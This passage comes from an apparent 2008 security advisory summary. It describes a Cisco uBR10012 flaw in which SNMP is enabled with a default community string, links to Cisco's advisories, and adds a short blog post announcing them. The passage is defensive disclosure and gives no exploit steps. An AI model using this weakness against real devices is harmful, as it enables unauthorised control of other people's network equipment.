12) A security issue is caused due to the device automatically enabling SNMP with a default community string, which can be exploited to gain control of an affected system.

Successful exploitation requires that a device is configured for linecard redundancy.

This vulnerability affects Cisco uBR10012 series devices running IOS.

Solution:
Update to the fixed version (please see the vendor's advisories for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml

Flurry of Security Advisories from CISCO

Published: 2008-09-24,
Last Updated: 2008-09-24 18:43:56 UTC
by Deborah Hale (Version: 1)

Cisco has released a number of Security Advisories for numerous products and IOS releases today. We are in the process of reviewing the advisories and will post a recap later. For now you can take a look at the advisories on CISCO's website at:


www.cisco.com/en/US/products/products_security_advisories_listing.html.